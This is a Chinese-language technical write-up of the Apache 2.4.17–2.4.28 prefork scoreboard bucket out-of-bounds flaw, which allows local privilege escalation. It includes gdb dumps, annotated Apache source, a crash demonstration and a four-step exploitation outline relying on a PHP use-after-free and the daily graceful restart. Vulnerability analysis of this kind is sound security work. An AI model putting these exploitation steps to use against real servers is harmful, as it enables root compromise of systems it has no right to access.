标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-2361]   作者: ecawen 发表于: [2019-04-13]  [2019-04-13]被用户:ecawen 修改过

本文共 [1934] 位读者顶过

0x00 介绍

从2.4.17到 2.4.28版本,Apache HTTP 发现存在本地提权漏洞,原因是数组访问越界导致任意函数调用。该漏洞由Apache的优雅重启导致(apache2ctl graceful).在标准Linux配置中,logrotate实用程序每天上午6:25运行此命令一次,以便重置日志文件句柄。 [出自:jiwo.org]

该漏洞影响mod_prefork,mod_worker和mod_event。下面演示以mod_prefork为主。

0x01 漏洞描述

多处理模块(MPM),prefork模型中,主服务进程以root权限模式运行,管理一个单线程,低权限(www-data)工作进程池,用于处理HTTP请求。

├─httpd(11666)─┬─httpd(12300)
│              ├─httpd(12301)
│              ├─httpd(12302)
│              ├─httpd(12303)
│              └─httpd(12304)

root      11666  0.0  0.3 272128 12944 ?        Ss   15:01   0:00 /usr/local/httpd//bin/httpd -k restart
www       12300  0.0  0.2 274344  9336 ?        S    15:12   0:00 /usr/local/httpd//bin/httpd -k restart
www       12301  0.0  0.2 274344  8076 ?        S    15:12   0:00 /usr/local/httpd//bin/httpd -k restart
www       12302  0.0  0.2 274344  9476 ?        S    15:12   0:00 /usr/local/httpd//bin/httpd -k restart
www       12303  0.0  0.2 274344  9476 ?        S    15:12   0:00 /usr/local/httpd//bin/httpd -k restart
www       12304  0.0  0.2 274344  8076 ?        S    15:12   0:00 /usr/local/httpd//bin/httpd -k restart

为了从工作进程那里获得反馈,Apache维护了一个共享内存区域(SHM),scoreboard,它包含各种信息,例如工作进程PID和他们处理的最后一个请求。

每个工作进程都要维护与其PID相关联的process_score结构,并具有对SHM的完全读/写访问权限。

ap_scoreboard_image: 指向共享内存块的指针

(gdb) p *ap_scoreboard_image 
$3 = {
  global = 0x7f4a9323e008, 
  parent = 0x7f4a9323e020, 
  servers = 0x55835eddea78
}
(gdb) p ap_scoreboard_image->servers[0]
$5 = (worker_score *) 0x7f4a93240820

与工作进程PID 12300关联的共享内存示例

(gdb) p ap_scoreboard_image->parent[0] $6 = { pid = 12300, generation = 0, quiescing = 0 '\000', not_accepting = 0 '\000', connections = 0, write_completion = 0, lingering_close = 0, keep_alive = 0, suspended = 0, bucket = 0 <- index for all_buckets } (gdb) ptype *ap_scoreboard_image->parent
type = struct process_score { pid_t pid; ap_generation_t generation; char quiescing; char not_accepting; apr_uint32_t connections; apr_uint32_t write_completion; apr_uint32_t lingering_close; apr_uint32_t keep_alive; apr_uint32_t suspended; int bucket; <- index for all_buckets } 

当Apache优雅重启时(),他的主服务进程杀死所有老的工作进程并用新的工作进程代替。

[root@bogon john]# ps -aux | grep http
root      12836  0.0  0.3 272260 13012 ?        Ss   15:35   0:00 /usr/local/httpd//bin/httpd -k start
www       15687  0.0  0.1 274344  7632 ?        S    17:33   0:00 /usr/local/httpd//bin/httpd -k start
www       15688  0.0  0.1 274344  7632 ?        S    17:33   0:00 /usr/local/httpd//bin/httpd -k start
www       15689  0.0  0.1 274344  7632 ?        S    17:33   0:00 /usr/local/httpd//bin/httpd -k start
www       15690  0.0  0.1 274344  7632 ?        S    17:33   0:00 /usr/local/httpd//bin/httpd -k start
www       15691  0.0  0.1 274344  7632 ?        S    17:33   0:00 /usr/local/httpd//bin/httpd -k start
root      15904  0.0  0.0 112712   980 pts/0    S+   17:53   0:00 grep --color=auto http
[root@bogon john]# apachectl graceful
[root@bogon john]# ps -aux | grep http
root      12836  0.0  0.3 272260 13024 ?        Ss   15:35   0:00 /usr/local/httpd//bin/httpd -k start
www       15945  0.0  0.1 274344  7652 ?        S    17:53   0:00 /usr/local/httpd//bin/httpd -k start
www       15946  0.0  0.1 274344  7652 ?        S    17:53   0:00 /usr/local/httpd//bin/httpd -k start
www       15947  0.0  0.1 274344  7652 ?        S    17:53   0:00 /usr/local/httpd//bin/httpd -k start
www       15948  0.0  0.1 274344  7652 ?        S    17:53   0:00 /usr/local/httpd//bin/httpd -k start
www       15949  0.0  0.1 274344  7652 ?        S    17:53   0:00 /usr/local/httpd//bin/httpd -k start
root      15951  0.0  0.0 112712   976 pts/0    S+   17:53   0:00 grep --color=auto http
(gdb) p $index = ap_scoreboard_image->parent[0]->bucket
(gdb) p all_buckets[$index]
$7 = {
  pod = 0x7f19db2c7408, 
  listeners = 0x7f19db35e9d0, 
  mutex = 0x7f19db2c7550
}
(gdb) ptype all_buckets[$index]
type = struct prefork_child_bucket {
    ap_pod_t *pod;
    ap_listen_rec *listeners;
    apr_proc_mutex_t *mutex; <-- } (gdb) ptype apr_proc_mutex_t apr_proc_mutex_t { apr_pool_t *pool; const apr_proc_mutex_unix_lock_methods_t *meth; <-- int curr_locked; char *fname; ... } (gdb) ptype apr_proc_mutex_unix_lock_methods_t apr_proc_mutex_unix_lock_methods_t { ... apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <-- ... } 

由于优雅重启,老的工作进程的bucket值会被主服务进程用来访问all_buckets数组.又由于没有进行下标检查,从而会造成提权。

0x02 原理分析

  1. 恶意用户首先修改bucket,并使其指向恶意构造的prefork_child_bucket结构(共享内存中)。

  2. 优雅重启

主服务进程会杀死以前所有的工作进程,然后调用prefork_run,fork出新的工作进程

<server/mpm/prefork/prefork.c> //省略无关的部分 static int prefork_run(apr_pool_t *_pconf, apr_pool_t *plog, server_rec *s) { int index; int remaining_children_to_start; int i; ap_log_pid(pconf, ap_pid_fname); if (!retained->mpm->was_graceful) {//跳过,因为优雅启动时,was_graceful为true if (ap_run_pre_mpm(s->process->pool, SB_SHARED) != OK) { retained->mpm->mpm_state = AP_MPMQ_STOPPING; return !OK; } /* fix the generation number in the global score; we just got a new,  * cleared scoreboard  */ ap_scoreboard_image->global->running_generation = retained->mpm->my_generation; } ... if (!retained->mpm->was_graceful) { startup_children(remaining_children_to_start); remaining_children_to_start = 0; } ... while (!retained->mpm->restart_pending && !retained->mpm->shutdown_pending) { ... ap_wait_or_timeout(&exitwhy, &status, &pid, pconf, ap_server_conf);//获取被杀死的工作进程的PID ... if (pid.pid != -1) { processed_status = ap_process_child_status(&pid, exitwhy, status); child_slot = ap_find_child_by_pid(&pid);//获取PID对应于计分板中对应parent的下标 ... /* non-fatal death... note that it's gone in the scoreboard. */ if (child_slot >= 0) { (void) ap_update_child_status_from_indexes(child_slot, 0, SERVER_DEAD, (request_rec *) NULL); prefork_note_child_killed(child_slot, 0, 0); if (processed_status == APEXIT_CHILDSICK) { /* child detected a resource shortage (E[NM]FILE, ENOBUFS, etc)  * cut the fork rate to the minimum  */ retained->idle_spawn_rate = 1; } else if (remaining_children_to_start && child_slot < ap_daemons_limit) {//如果工作进程的死亡不是致命的 /* we're still doing a 1-for-1 replacement of dead  * children with new children  */ make_child(ap_server_conf, child_slot, ap_get_scoreboard_process(child_slot)->bucket);//则将死亡的工作进程的bucket作为参数传递(注意:bucket我们可以用“非常规手段”进行修改,从而提权) --remaining_children_to_start; } } } return OK; } 

make_child:

static int make_child(server_rec *s, int slot, int bucket) { ... if (!pid) { my_bucket = &all_buckets[bucket];//使my_bucket指向共享内存中的到恶意构造的prefork_child_bucket结构 ... child_main(slot, bucket); ... return 0; } static void child_main(int child_num_arg, int child_bucket) { ... status = SAFE_ACCEPT(apr_proc_mutex_child_init(&my_bucket->mutex, apr_proc_mutex_lockfile(my_bucket->mutex), pchild));//如果Apache侦听两个或更多端口,则SAFE_ACCEPT()将仅执行(这通常是因为服务器侦听HTTP(80)和HTTPS(443)) ... } APR_DECLARE(apr_status_t) apr_proc_mutex_child_init(apr_proc_mutex_t **mutex, const char *fname, apr_pool_t *pool) { return (*mutex)->meth->child_init(mutex, pool, fname); } 

如果apr_proc_mutex_child_init执行,这导致(* mutex) - > meth-> child_init(mutex,pool,fname)被调用,从而执行恶意代码(注意,执行恶意代码的时候,进程仍然处于root权限,后面才降低自身的权限)。

0x03 通过gdb恶意修改bucket值造成的崩溃

(gdb) 
716            child_main(slot, bucket);
(gdb) s
child_main (child_num_arg=child_num_arg@entry=0, child_bucket=child_bucket@entry=80808080) at prefork.c:380
380    {
(gdb) n
..........
432        status = SAFE_ACCEPT(apr_proc_mutex_child_init(&my_bucket->mutex,
(gdb) s

Program received signal SIGSEGV, Segmentation fault.
0x000000000046c16b in child_main (child_num_arg=child_num_arg@entry=0, 
    child_bucket=child_bucket@entry=80808080) at prefork.c:432
432        status = SAFE_ACCEPT(apr_proc_mutex_child_init(&my_bucket->mutex,

0x04 利用

利用分4个步骤

  • 获得工作进程的R/W访问权限
  • 在共享内存中写一个假的prefork_child_bucket结构
  • 使all_buckets [bucket]指向该结构
  • 等待早上6:25获得任意函数调用

问题:PHP不允许读写/proc/self/mem, 这会阻止我们利用简单方法编辑共享内存

获取工作进程内存的R/W访问权限

PHP UAF 0-day

由于mod_prefork经常与mod_php结合使用,因此通过PHP利用漏洞似乎很自然。我们使用PHP 7.x中的0day UAF(这似乎也适用于PHP5.x)来完成利用(也可以利用CVE-2019-6977)